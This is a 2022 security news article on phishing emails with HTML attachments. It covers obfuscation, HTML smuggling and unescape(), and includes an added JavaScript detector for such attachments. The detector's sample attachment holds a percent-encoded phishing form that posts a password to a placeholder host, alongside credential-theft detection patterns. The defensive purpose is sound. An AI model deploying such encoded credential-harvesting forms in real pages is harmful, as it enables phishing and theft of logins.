Phishing emails with HTML attachments still a huge concern in 2022

In the first four months of 2022, HTML files remained one of the most common attachments used in phishing attacks. This shows that the strategy is still successful against spam detection engines. Malicious actors often use HTML documents included in phishing emails.

HTML (HyperText Markup Language) is a markup language for text that will be displayed in a web browser. The files are digital content documents that are meant to be read in web browsers. These files are commonly used in phishing emails to link victims to malicious websites.

When it comes to hiding phishing information, HTML has more options than plain text email. Because HTML is not in itself malicious, email security software is less likely to detect attachments of concern. As a result, the email is often delivered successfully to the victim's inbox.

Phishing attachment that looks like a Microsoft login (BleepingComputer)

According to Kaspersky’s own statistics, the pattern of sending infected emails with HTML files is still strong. In the first four months of the year, the security firm discovered 2 million such emails targeted at its clients. The highest number of detections was 851,000 in March 2022. There was a reduction to 387,000 in April, but this might be a temporary glitch.

Malicious HTML attachment detection (Kaspersky)

How does HTML stay undetected?

Phishing forms, redirection techniques, and data-stealing components are frequently employed in HTML attachments, ranging from basic redirection to obfuscating JavaScript to hide phishing forms. Because antivirus and other security tools may detect harmful scripts or URLs in plaintext, cybercriminals use JavaScript obfuscation instead.

HTML smuggling is the technique of hiding malicious URLs and behaviour in HTML attachments using JavaScript. It has grown increasingly popular in recent years.

Another method for concealing phishing material in email attachments is to encode or compress the code. This makes the code look considerably smaller than it actually is. Threat actors obfuscate their code using publicly accessible tools to make malicious scripts even more difficult to find. These tools allow unique custom setups, which are less likely to be identified.

According to Kaspersky, threat actors employed “morse code” in their HTML attachment to hide a phishing form that would be shown when the HTML attachment was opened.

Phishing attachment source/morse code HTML (BleepingComputer)

Threat actors in such circumstances employ deprecated functions like “unescape()”, according to Kaspersky. This function replaces “%xx” character sequences in a string with their ASCII values.

Although decodeURI() and decodeURIComponent() have mostly replaced it, most modern browsers still support it. It is likely that security tools and spam detection engines that are more focused on existing tactics would miss it.
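The detection gap described above can be narrowed by decoding escaped strings statically and re-checking the decoded layer. The following JavaScript is an added example, not code from the original article or from Kaspersky; the indicator names, the threshold of eight escapes, and the sample attachment are assumptions constructed for illustration.

```javascript
// Added example: static triage of an HTML attachment.
// Nothing is executed; escaped strings are decoded as data only.

// Decode %xx and %uXXXX the way unescape() does, without calling it.
function percentDecode(s) {
  return s.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi,
    (_, u, h) => String.fromCharCode(parseInt(u || h, 16)));
}

// Indicator names and patterns are assumptions chosen for this illustration.
const INDICATORS = [
  ["password-field", /<input[^>]+type\s*=\s*["']?password/i],
  ["form-posts-to-remote-url", /<form[^>]+action\s*=\s*["']?https?:\/\//i],
  ["script-redirect", /\blocation(?:\.href)?\s*=[^=]|\blocation\.(?:replace|assign)\s*\(/i],
];

// String literals made of percent-escapes plus the characters escape() leaves as-is.
const ESCAPED_LITERAL = /(["'])((?:%u[0-9a-f]{4}|%[0-9a-f]{2}|[\w@*+\-.\/])+)\1/gi;

function triageHtmlAttachment(html, maxLayers = 5) {
  const findings = new Set();
  if (/\bunescape\s*\(/.test(html)) findings.add("deprecated-unescape-call");
  let layer = html;
  for (let depth = 0; depth <= maxLayers; depth++) {
    for (const [name, re] of INDICATORS) {
      // Anything that only appears after decoding is reported as hidden.
      if (re.test(layer)) findings.add(depth === 0 ? name : `hidden:${name}`);
    }
    // Keep literals with at least 8 escapes (assumed threshold) and peel one layer.
    const literals = [...layer.matchAll(ESCAPED_LITERAL)]
      .map(m => m[2]).filter(s => (s.match(/%/g) || []).length >= 8);
    if (literals.length === 0) break;
    findings.add("percent-encoded-payload");
    layer = literals.map(percentDecode).join("\n");
  }
  return [...findings].sort();
}

// Constructed sample attachment; login.example.invalid is a placeholder host.
const SAMPLE_ATTACHMENT = `<html><body><script>
document.write(unescape("%3Cform%20action%3D%22https%3A//login.example.invalid/post%22%3E%3Cinput%20type%3D%22password%22%3E%3C/form%3E"));
</script></body></html>`;

console.log(triageHtmlAttachment(SAMPLE_ATTACHMENT));
```

A plaintext scan of the sample finds no form or password field; both appear only in the decoded layer, which is why they are reported with the `hidden:` prefix.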

Phishing sites exist in many shapes and sizes, but they’re frequently made to seem exactly like real web pages so that visitors don’t hesitate to submit their credentials.

Consider the following

Even though HTML attachment distribution had its “glory days” in 2019, it is no longer recommended. It’s necessary to stay alert, since threat actors use this tactic frequently in phishing attacks.

It is important to note that viewing these files may result in the execution of JavaScript on your computer. This might lead to malware being created automatically on your computer and security systems being bypassed.

Email phishing using an HTML attachment (Kaspersky)

Even if your email security system doesn’t issue any alerts, HTML attachments should always be treated with caution.

Avoid opening emails from unknown senders, or any attachments they may include, to keep from falling victim to phishing scams. Although Word files, PDFs, and other documents are often attached to emails, HTML attachments are rarely shared. If you see one in your inbox, it’s almost certainly a phishing email.
